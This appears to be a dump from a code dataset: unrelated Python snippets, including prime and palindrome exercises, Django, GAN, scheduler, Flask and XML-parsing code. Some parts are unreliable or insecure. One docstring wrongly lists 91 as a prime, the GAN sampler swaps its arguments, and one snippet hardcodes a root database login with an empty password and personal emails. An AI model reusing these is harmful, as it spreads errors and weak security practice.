print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 15:
expected = False
answer = problem1b(15600, 6)
print()
print('Test 15 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 16:
expected = False
answer = problem1b(10000, 6)
print()
print('Test 16 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 17:
expected = True
answer = problem1b(5861, 6)
print()
print('Test 17 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 18:
expected = False
answer = problem1b(5862, 6)
print()
print('Test 18 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
def problem1b(m, p):
"""
What comes in: Positive integers m and p,
with m >= 2 and (5 raised to the pth power) >= m.
What goes out: Let X = the sum of all the integers
between m and (5 raised to the pth power), inclusive,
that are prime.
This function returns True if X is prime.
This function returns False if X is NOT a prime.
Side effects: None.
Examples:
-- If m is 17 and p = 2, this function returns True,
because the sum of the primes
between 17 and (5 to the 2nd power, i.e. 25) is:
17 + 19 + 23, which is 59,
and 59 IS prime.
-- If m is 18 and p = 2, this function returns False,
because the sum of the primes
between 18 and (5 to the 2nd power, i.e. 25) is:
19 + 23, which is 42,
and 42 is NOT prime.
-- If m is 85 and p = 3, this function returns True,
because the sum of the primes
between 85 and (5 to the 3rd power, i.e. 125) is:
89 + 91 + 97 + 101 + 103 + 107 + 109 + 113, which is 719,
and 719 IS prime.
"""
# ------------------------------------------------------------------
# DONE: 4. Implement and test this function.
# Tests have been written for you (above).
####################################################################
# IMPORTANT:
# ** For full credit you must appropriately use (call)
# ** the appropriate functions that are defined above
# ** possibly including ones you have written.
####################################################################
# ------------------------------------------------------------------
if is_prime(problem1a(m, p)) == True:
return True
else:
return False
def test_problem1c():
""" Tests the problem1c function. """
print()
print('--------------------------------------------------')
print('Testing the problem1c function:')
print('--------------------------------------------------')
####################################################################
# THESE TESTS ARE ALREADY DONE. DO NOT CHANGE THEM.
# You may add more tests if you want,
# but you are not required to do so.
####################################################################
# Test 1:
expected = 5 * 10
answer = problem1c(50, 100)
print()
print('Test 1 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 2:
expected = 2 * 8
answer = problem1c(23, 53)
print()
print('Test 2 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 3:
expected = 2 * 5
answer = problem1c(33, 53)
print()
print('Test 3 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 4:
expected = 1 * 0
answer = problem1c(20, 22)
print()
print('Test 4 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 5:
expected = 4 * 7
answer = problem1c(101, 131)
print()
print('Test 5 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 6:
expected = 2 * 5
answer = problem1c(102, 130)
print()
print('Test 6 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 7:
expected = 107 * 168
answer = problem1c(2, 1000)
print()
print('Test 7 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 8:
expected = 90 * 1061
answer = problem1c(1000, 10000)
print()
print('Test 8 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 9:
expected = 83 * 133
answer = problem1c(101, 929)
print()
print('Test 9 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 10:
expected = 83 * 133
answer = problem1c(100, 930)
print()
print('Test 10 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 11:
expected = 81 * 131
answer = problem1c(102, 928)
print()
print('Test 11 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 12:
expected = 82 * 132
answer = problem1c(101, 928)
print()
print('Test 12 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 13:
expected = 82 * 132
answer = problem1c(102, 929)
print()
print('Test 13 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
# Test 14:
expected = 280 * 2237
answer = problem1c(100, 20000)
print()
print('Test 14 expected:', expected)
print(' actual: ', answer)
if expected != answer:
print(' **** THIS TEST FAILED. ****')
def problem1c(m, n):
"""
What comes in: Positive integers m and n, with m <= n.
What goes out: Returns the product XY where:
-- X is the number of integers from m to n, inclusive,
that are PALINDROMES.
-- Y is the number of integers from m to n, inclusive,
that are PRIME.
Side effects: None.
Examples:
-- If m is 50 and n is 100:
this function returns 5 * 10, which is 50,
because the palindromes between 50 and 100 are:
55 66 77 88 99 [so there are 5 of them]
and the primes between 50 and 100 are:
53 59 61 67 71 73 79 83 89 97
[so there are 10 of them]
-- If m is 23 and n is 53:
this function returns 2 * 8, which is 16,
because the palindromes between 23 and 53 are
33 44 [so there are 2 of them]
and the primes between 23 and 53 are
23 29 31 37 41 43 47 53
[so there are 8 of them]
"""
# ------------------------------------------------------------------
# DONE: 4. Implement and test this function.
# Tests have been written for you (above).
####################################################################
# IMPORTANT:
# ** For full credit you must appropriately use (call)
# ** the appropriate functions that are defined above.
####################################################################
# ------------------------------------------------------------------
count = 0
count1 = 0
for i in range(m, n + 1):
if is_palindrome(i) == True:
count += 1
if is_prime(i) == True:
count1 += 1
return count * count1
# ----------------------------------------------------------------------
# Calls main to start the ball rolling.
# ----------------------------------------------------------------------
main()
|
7,687 | 5c80561a3344c0240e59500e5dadc1f1ef7f380e | str="mama"
stringlength=len(str)
slicedString=str[stringlength::-1]
print (slicedString) |
7,688 | 7633944366c6655306bc41087b19a474e9c414b5 | from django.contrib import admin
from .models import Spot
from leaflet.admin import LeafletGeoAdmin
class SpotAdmin(LeafletGeoAdmin):
pass
admin.site.register(Spot, SpotAdmin)
|
7,689 | ea045d04b40341f34c780dceab1f21df93b7207a | # A class is like a blueprint for creating objects. An object has properties and methods(functions) associated with it. Almost everything in Python is an object
# import connect
# from connect import connect
#create class
import pymysql
# import MySQLdb
conn = pymysql.connect(host='127.0.0.1',user='root',password='',db='Python')
connect = conn.cursor()
class User():
#constructor
def __init__(self, name,email,age):
self.name = name
self.email = email
self.age = age
def getUserInfo(self):
# return f'His name is {self.name} and his age is {self.age}'
# conn = pymysql.connect(host='127.0.0.1',user='root',password='',db='Python')
# connect = conn.cursor()
user_data = 'select * from students;'
connect.execute(user_data)
data = connect.fetchall()
i=0
for new_data in data:
# print(f'student name is {data[i][1]} {data[i][2]} and age is {data[i][3]}')
print(data)
i += 1
# return connect.fetchall()
def IncreaseAge(self):
self.age += 1
class Customer(User):
#constructor
def __init__(self, name,email,age):
self.name = name
self.email = email
self.age = age
self.balance = 0
def getBalance(self,balance):
self.balance = balance
#Init User object
brad = User('Kaushal Patel','kaushalpatel089@gmail.com',22)
customer = Customer('Babulal Kumawat','babubhai@gmail.com',22)
# brad.IncreaseAge()
# customer.getBalance(22)
# print(customer.getUserInfo())
# print(brad.getUserInfo())
# print(brad.getUserInfo())
# brad.getUserInfo()
brad.getUserInfo() |
7,690 | 39643454cbef9e6fa7979d0f660f54e07d155bc7 | #!/usr/bin/env python3
'''Testing File'''
import tensorflow.keras as K
def test_model(
network, data, labels, verbose=True
):
'''A Function that tests
a neural network'''
return network.evaluate(
x=data,
y=labels,
verbose=verbose
)
|
7,691 | 8766003a85b1ed83927988df147b0b3004cb91f9 | def solution(name):
Len = len(name)
nameList = [name[i] for i in range(Len)]
nameField = ['A' for i in range(Len)]
answer = 0
# 정방향
for i in range(Len):
a = ord(nameField[i])
b = ord(nameList[i])
if b-a <= 13 : # 절반 이하면 그냥 더하고
answer += b-a
else : # 절반 넘으면 26에서 빼기
answer += 26 - (b-a)
nameField[i] = nameList[i] # name "A"가 들어간게 있을수도 있으니
if nameField == nameList : # 값 바꿔주고 전체 체크!!
break
answer +=1 # 이동가중치 ++
dap = answer
# 정방향 + 역방향
t = (int)(Len/2)
for i in range(t): # 0~전체길이/2
nameField = ['A' for i in range(Len)]
answer = i
for j in range(i+1): #정방향
a = ord(nameField[j])
b = ord(nameList[j])
if b-a <= 13 :
answer += b-a
else :
answer += 26 - (b-a)
nameField[j] = nameList[j]
if nameField == nameList :
break
answer +=1
for j in range(Len-1,i,-1): #역방향
a = ord(nameField[j])
b = ord(nameList[j])
if b-a <= 13 :
answer += b-a
else :
answer += 26 - (b-a)
nameField[j] = nameList[j]
if nameField == nameList :
break
answer +=1
dap = min(dap,answer)
return dap
'''
중복코드로 많아 함수로 빼고싶었지만..패쓰!
정방향의 가중치와
정방향으로 0~길이/2 만큼까지 가고 + 역방향 가면서
원하는 name만들어졌는지 계속 체크!
최소가중치를 구해서 출력!!
''' |
7,692 | ea876d903263c907f63b2f37a81f2576345dae62 | botnet = open("bots.txt","r")
bots = botnet.read()
print(bots.split('\n'))
botnet.close() |
7,693 | d3b00a8d410248aedb1c43354e89ccc298b56a3c | # -*- coding: utf-8 -*-
# @Time : 2020/3/4 10:34
# @Author : YYLin
# @Email : 854280599@qq.com
# @File : Skip_GAN.py
from Dataload import load_anime_old, save_images, load_CelebA
from Srresnet_Model import Generator_srresnet, Discriminator_srresnet
import tensorflow as tf
import numpy as np
import sys
class Skip_GAN(object):
def __init__(self, sess, epoch, batch_size, dataset_name, result_dir, z_dim, y_dim, checkpoint_dir, num_resblock,
Cycle_lr, Class_weight, Resnet_weight):
self.sess = sess
self.dataset_name = dataset_name
self.result_dir = result_dir
self.epoch = epoch
self.batch_size = batch_size
self.z_dim = z_dim
self.y_dim = y_dim
self.checkpoint_dir = checkpoint_dir
self.num_resblock = num_resblock
self.Cycle_lr = Cycle_lr
self.Class_weight = Class_weight
# La is used to increase the weight of image authenticity
self.la = 10
self.learningRateD = 2e-4
self.learningRateG = 2e-4
#
self.Resnet_weight = Resnet_weight
# 加载不同的数据集
if self.dataset_name == 'anime':
print('loading anime .............')
self.height = 96
self.width = 96
self.c_dim = 3
self.data_X, self.data_Y = load_anime_old()
print('self.data_X:', self.data_X.shape, 'self.data_y:', self.data_Y.shape)
elif self.dataset_name == 'celebA':
print('loading celebA ...............')
self.height = 96
self.width = 96
self.c_dim = 3
self.data_X, self.data_Y = load_CelebA()
print('self.data_X:', self.data_X.shape, 'self.data_y:', self.data_Y.shape)
else:
print('Sorry there is no option for ', self.dataset_name)
sys.exit()
def build_model(self):
# some placeholder in our model
self.y = tf.placeholder(tf.float32, [None, self.y_dim], name='y')
self.img = tf.placeholder(tf.float32, [self.batch_size, self.height, self.width, 3], name='img')
self.z = tf.placeholder(tf.float32, [None, self.z_dim])
self.G_sample = Generator_srresnet(self.z, self.y, self.num_resblock, self.Resnet_weight)
print('The return of Generator:', self.G_sample)
# 识别器对真实图像进行判断
D_real, C_real = Discriminator_srresnet(self.img, dataset=self.dataset_name)
print('The return of Discriminator:', D_real, C_real)
# 识别器对生成图像进行判断
D_fake, C_fake = Discriminator_srresnet(self.G_sample, dataset=self.dataset_name, reuse=True)
print('The return of Discriminator:', D_fake, C_fake)
# 判断图像的类别
self.C_real_loss = tf.reduce_mean(
tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=C_real, labels=self.y), axis=1))
self.C_fake_loss = tf.reduce_mean(
tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=C_fake, labels=self.y), axis=1))
# D_Loss 希望真实图像被判断为1 希望生成图像被判断为0
D_real_loss = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(logits=D_real, labels=tf.ones_like(D_real)))
D_fake_loss = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake, labels=tf.zeros_like(D_fake)))
'''注意 la也即是我是用动态学习率的时候要关注的参数
但是我的目标是使得类别损失变得更加的大 而不是真伪的损失'''
D_loss = D_real_loss + D_fake_loss
self.DC_loss = (self.la * D_loss + self.C_real_loss)
# 对生成模型的损失也在关注该模型
G_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake, labels=tf.ones_like(D_fake)))
self.GC_loss = (self.la * G_loss + self.C_fake_loss)
print('Calualtion the loss of Optimizer')
self.theta_D = [v for v in tf.global_variables() if 'd_net' in v.name]
self.theta_G = [v for v in tf.global_variables() if 'g_net' in v.name]
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
self.d_updates = tf.train.AdamOptimizer(self.learningRateD, beta1=0.5, beta2=0.9).minimize(self.DC_loss,
var_list=self.theta_D)
self.g_updates = tf.train.AdamOptimizer(self.learningRateG, beta1=0.5, beta2=0.9).minimize(self.GC_loss,
var_list=self.theta_G)
self.sampler = Generator_srresnet(self.y, self.z, self.num_resblock, self.Resnet_weight, reuse=True, train=False)
def train(self):
print('begin training ...........')
tf.global_variables_initializer().run()
# sample_num 用于控制存储图像
sample_num = 64
tot_num_samples = min(sample_num, self.batch_size)
manifold_h = int(np.floor(np.sqrt(tot_num_samples)))
manifold_w = int(np.floor(np.sqrt(tot_num_samples)))
# 定义随机噪音以及标签 2019/09/29
self.sample = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim)).astype(np.float32)
self.sample_y = self.data_Y[0:self.batch_size]
counter = 0
# shuffle the dataset 2019/9/29
batch_offset = 0
data_index = np.arange(self.data_X.shape[0])
np.random.shuffle(data_index)
self.data_X = self.data_X[data_index, :, :, :]
self.data_Y = self.data_Y[data_index]
# 这种方式会有使得小于batch_size个数据用不上
for epoch in range(self.epoch):
if batch_offset + self.batch_size > len(self.data_X):
batch_offset = 0
# shuffle dataset
data_index = np.arange(self.data_X.shape[0])
np.random.shuffle(data_index)
self.data_X = self.data_X[data_index, :, :, :]
self.data_Y = self.data_Y[data_index]
else:
# 首先是得到输入的数据
batch_images = self.data_X[batch_offset:batch_offset + self.batch_size]
batch_codes = self.data_Y[batch_offset:batch_offset + self.batch_size]
batch_z = np.random.uniform(-1, 1, [self.batch_size, self.z_dim]).astype(np.float32)
# 然后更新识别器
for i_d_loss in range(3):
_, d_loss = self.sess.run([self.d_updates, self.DC_loss], feed_dict={self.img: batch_images,
self.y: batch_codes,
self.z: batch_z})
for i_g_loss in range(1):
# 最后更新生成器模型
_, g_loss, _ = self.sess.run([self.g_updates, self.GC_loss, self.G_sample],
feed_dict={self.y: batch_codes, self.img: batch_images, self.z: batch_z})
batch_offset = batch_offset + self.batch_size
# display the loss every 10 steps
if (counter % 10) == 0:
print('Epoch: %2d counter: %5d d_loss: %.8f, g_loss: %.8f' % (epoch, counter, d_loss, g_loss))
# save image every 500 steps
if counter % 500 == 0:
samples = self.sess.run(self.sampler,
feed_dict={self.z: self.sample, self.y: self.sample_y})
save_images(samples[:manifold_h * manifold_w, :, :, :], [manifold_h, manifold_w],
self.result_dir + '/{}.png'.format(str(counter).zfill(7)))
# save the model every 1000 steps
if counter % 1000 == 0:
saver = tf.train.Saver(max_to_keep=5)
saver.save(self.sess, self.checkpoint_dir + '/{}'.format(str(counter).zfill(7)))
if (counter % 100) == 0:
if self.Cycle_lr:
self.learningRateD = self.learningRateD * 0.99
if self.learningRateD < 0.0001:
self.learningRateD = 2e-4
if (counter % 500) == 0:
if self.Class_weight:
if self.la > 25:
self.la = 25
else:
self.la = self.la * 1.5
counter += 1
|
7,694 | 211ef4c64e42c54423ac8dab2128952874a2cf5a | # Generated by Django 2.2.10 on 2020-03-13 14:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('system', '0005_location'),
]
operations = [
migrations.AddField(
model_name='setting',
name='runned_locations_initial_data',
field=models.BooleanField(blank=True, default=False),
),
migrations.AlterField(
model_name='location',
name='name',
field=models.CharField(max_length=128, unique=True),
),
]
|
7,695 | bce16762c0739087a8309872da4ac04298c50893 | """Step (with Warm up) learning rate scheduler module."""
from typing import Union
import torch
from torch.optim.lr_scheduler import _LRScheduler
from typeguard import check_argument_types
from espnet2.schedulers.abs_scheduler import AbsBatchStepScheduler
class WarmupStepLR(_LRScheduler, AbsBatchStepScheduler):
"""The WarmupStepLR scheduler.
This scheduler is the combination of WarmupLR and StepLR:
WarmupLR:
lr = optimizer.lr * warmup_step ** 0.5
* min(step ** -0.5, step * warmup_step ** -1.5)
WarmupStepLR:
if step <= warmup_step:
lr = optimizer.lr * warmup_step ** 0.5
* min(step ** -0.5, step * warmup_step ** -1.5)
else:
lr = optimizer.lr * (gamma ** (epoch//step_size))
Note that the maximum lr equals to optimizer.lr in this scheduler.
"""
def __init__(
self,
optimizer: torch.optim.Optimizer,
# for WarmupLR
warmup_steps: Union[int, float] = 25000,
# for StepLR
steps_per_epoch: int = 10000,
step_size: int = 1,
gamma: float = 0.1,
last_epoch: int = -1,
):
assert check_argument_types()
self.warmup_steps = warmup_steps
self.step_num = 0
self.epoch_num = 0
# NOTE: This number should be adjusted accordingly
# once batch_size/ngpu/num_nodes is changed.
# To get the exact number of iterations per epoch, refer to
# https://github.com/espnet/espnet/discussions/4404
self.steps_per_epoch = steps_per_epoch
self.warmup_epoch = warmup_steps // steps_per_epoch
self.lr_scale = warmup_steps**-1
# after warmup_steps, decrease lr by `gamma` every `step_size` epochs
self.step_size = step_size
self.gamma = gamma
# __init__() must be invoked before setting field
# because step() is also invoked in __init__()
super().__init__(optimizer, last_epoch)
def __repr__(self):
return (
f"{self.__class__.__name__}(warmup_steps={self.warmup_steps}, "
f"steps_per_epoch={self.steps_per_epoch},"
f" step_size={self.step_size}, gamma={self.gamma})"
)
def get_lr(self):
self.step_num += 1
if self.step_num % self.steps_per_epoch == 0:
self.epoch_num += 1
if self.step_num <= self.warmup_steps:
return [lr * self.lr_scale * self.step_num for lr in self.base_lrs]
else:
return [
lr
* self.gamma ** ((self.epoch_num - self.warmup_epoch) // self.step_size)
for lr in self.base_lrs
]
|
7,696 | 83fe635e35711c2c41d043a59d00a50cc87e69fa | "Base document saver context classes."
import copy
import os.path
import sys
import flask
from . import constants
from . import utils
class BaseSaver:
"Base document saver context."
DOCTYPE = None
EXCLUDE_PATHS = [["_id"], ["_rev"], ["doctype"], ["modified"]]
HIDDEN_VALUE_PATHS = []
def __init__(self, doc=None):
if doc is None:
self.original = {}
self.doc = {"_id": utils.get_iuid(),
"created": utils.get_time()}
self.initialize()
else:
self.original = copy.deepcopy(doc)
self.doc = doc
self.prepare()
def __enter__(self):
return self
def __exit__(self, etyp, einst, etb):
if etyp is not None: return False
self.finish()
self.doc["doctype"] = self.DOCTYPE
self.doc["modified"] = utils.get_time()
flask.g.db.put(self.doc)
self.add_log()
def __getitem__(self, key):
return self.doc[key]
def __setitem__(self, key, value):
self.doc[key] = value
def initialize(self):
"Initialize the new document."
pass
def prepare(self):
"Preparations before making any changes."
pass
def finish(self):
"Final changes and checks on the document before storing it."
pass
def wrapup(self):
"""Wrap up the save operation by performing actions that
must be done after the document has been stored.
"""
pass
def add_log(self):
"""Add a log entry recording the the difference betweens the current and
the original document, hiding values of specified keys.
'added': list of keys for items added in the current.
'updated': dictionary of items updated; original values.
'removed': dictionary of items removed; original values.
"""
self.stack = []
diff = self.diff(self.original, self.doc)
entry = {"_id": utils.get_iuid(),
"doctype": constants.DOCTYPE_LOG,
"docid": self.doc["_id"],
"diff": diff,
"timestamp": utils.get_time()}
self.modify_log_entry(entry)
if hasattr(flask.g, "current_user") and flask.g.current_user:
entry["username"] = flask.g.current_user["username"]
else:
entry["username"] = None
if flask.has_request_context():
entry["remote_addr"] = str(flask.request.remote_addr)
entry["user_agent"] = str(flask.request.user_agent)
else:
entry["remote_addr"] = None
entry["user_agent"] = os.path.basename(sys.argv[0])
flask.g.db.put(entry)
def diff(self, old, new):
"""Find the differences between the old and the new documents.
Uses a fairly simple algorithm which is OK for shallow hierarchies.
"""
added = {}
removed = {}
updated = {}
new_keys = set(new.keys())
old_keys = set(old.keys())
for key in new_keys.difference(old_keys):
self.stack.append(key)
if self.stack not in self.EXCLUDE_PATHS:
if self.stack in self.HIDDEN_VALUE_PATHS:
added[key] = "<hidden>"
else:
added[key] = new[key]
self.stack.pop()
for key in old_keys.difference(new_keys):
self.stack.append(key)
if self.stack not in self.EXCLUDE_PATHS:
if self.stack in self.HIDDEN_VALUE_PATHS:
removed[key] = "<hidden>"
else:
removed[key] = old[key]
self.stack.pop()
for key in new_keys.intersection(old_keys):
self.stack.append(key)
if self.stack not in self.EXCLUDE_PATHS:
new_value = new[key]
old_value = old[key]
if isinstance(new_value, dict) and isinstance(old_value, dict):
changes = self.diff(old_value, new_value)
if changes:
if self.stack in self.HIDDEN_VALUE_PATHS:
updated[key] = "<hidden>"
else:
updated[key] = changes
elif new_value != old_value:
if self.stack in self.HIDDEN_VALUE_PATHS:
updated[key]= dict(new_value="<hidden>",
old_value="<hidden>")
else:
updated[key]= dict(new_value= new_value,
old_value=old_value)
self.stack.pop()
result = {}
if added:
result['added'] = added
if removed:
result['removed'] = removed
if updated:
result['updated'] = updated
return result
def modify_log_entry(self, entry):
"Modify the log entry, if required."
pass
class AttachmentsSaver(BaseSaver):
"Document saver context handling attachments."
def prepare(self):
self._delete_attachments = set()
self._add_attachments = []
def wrapup(self):
"""Delete any specified attachments.
Store the input files as attachments.
Must be done after document is saved.
"""
for filename in self._delete_attachments:
rev = flask.g.db.delete_attachment(self.doc, filename)
self.doc["_rev"] = rev
for attachment in self._add_attachments:
flask.g.db.put_attachment(self.doc,
attachment["content"],
filename=attachment["filename"],
content_type=attachment["mimetype"])
def add_attachment(self, filename, content, mimetype):
self._add_attachments.append({"filename": filename,
"content": content,
"mimetype": mimetype})
def delete_attachment(self, filename):
self._delete_attachments.add(filename)
def modify_log_items(self, entry):
"Modify the log entry to add info about attachment changes."
if self._delete_attachments:
entry["attachments_deleted"] = self._delete_attachments
if self._add_attachments:
for att in self._add_attachments:
att["size"] = len(att.pop("content"))
entry["attachments_added"] = self._add_attachments
|
7,697 | f4dd9500835cb22a859da8bd57487052522bb593 |
alien_0 = {} # 声明一个空字典
alien_0['color'] = 'green' # 向空字典中添加值
alien_0['points'] = 5
print(alien_0)
x = alien_0['color']
print(f"\nThe alien is {alien_0['color']}") # 引号的用法
alien_0['color'] = 'yellow' # 对字典中的元素重新赋值
print(f"The alien is now {alien_0['color']}")
|
7,698 | 64c4b64b6fb0cfa25c17f66243c60a5dc0166017 | #!/usr/bin/python
#Autor: Jesus Fabian Cubas <jfabian@computer.org>
#if
sesion = 2
if sesion == 1 :
print 'estamos en la sesion 01'
elif sesion == 2 :
print 'estamos en la sesion 02'
else :
print 'no estamos en la sesion 01'
#while
edad = 0
while edad < 18 :
edad = edad + 1
print edad
#for
lista = ["a", "b", "c", "d"]
for elemento in lista :
print elemento
|
7,699 | 2b7bb02a25504e7481d3bc637ea09bcf9addb990 | import os
from xml.dom import minidom
import numpy as np
def get_branches_dir(root_dir):
branches_dir = []
folds = os.listdir(root_dir)
while folds:
branch_dir = root_dir + '/' + folds.pop()
branches_dir.append(branch_dir)
return branches_dir
def tolist(xml, detname):
try:
data = minidom.parse(xml)
except:
print('parse error')
ErrorFiles.append(xml)
return
detectors = data.documentElement
date = detectors.getElementsByTagName('date')[0].childNodes[0].data
time = detectors.getElementsByTagName('time')[0].childNodes[0].data
dets = detectors.getElementsByTagName('detector')
laneVolume = 0
laneOccupancy = 0
laneSpeed = 0
for det in dets:
try:
detectorID = det.getElementsByTagName('detector-Id')[0]
except IndexError:
continue
# print"\ndetector-Id: %s" % detectorID.childNodes[0].data
if detectorID.childNodes[0].data in detname:
lanes = det.getElementsByTagName('lane')
for lane in lanes:
# laneNumber = lane.getElementsByTagName('lane-Number')[0]
laneStatus = lane.getElementsByTagName('lane-Status')[0]
if laneStatus.childNodes[0].data == "OK":
try:
laneVolume += int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)
laneOccupancy += int(lane.getElementsByTagName('lane-Occupancy')[0].childNodes[0].data) * int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)
laneSpeed += int(lane.getElementsByTagName('lane-Speed')[0].childNodes[0].data) * int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)
except IndexError:
break
else:
break
if laneVolume > 0:
for i in range(0, len(detname)):
if detectorID.childNodes[0].data == detname[i]:
c = i
detectorData[c][0].append(date)
detectorData[c][1].append(time)
detectorData[c][2].append(laneVolume)
detectorData[c][3].append(laneOccupancy/float(laneVolume))
detectorData[c][4].append(laneSpeed/float(laneVolume))
month_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'
os.chdir(month_dir) # change the current working directory to path.
day_dir = get_branches_dir(month_dir)
detNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D', 'MI044E250.8D', 'MI044E246.6D']
ErrorFiles = []
for dayFile in day_dir:
detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []]]
xmlFiles = get_branches_dir(dayFile)
for xml in xmlFiles:
if not os.path.isdir(xml):
print(xml)
tolist(xml, detNames)
for i in range(0, len(detNames)):
m = np.array(detectorData[i])
os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/'+detNames[i])
np.save(detectorData[0][0][0]+'.npy', m)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.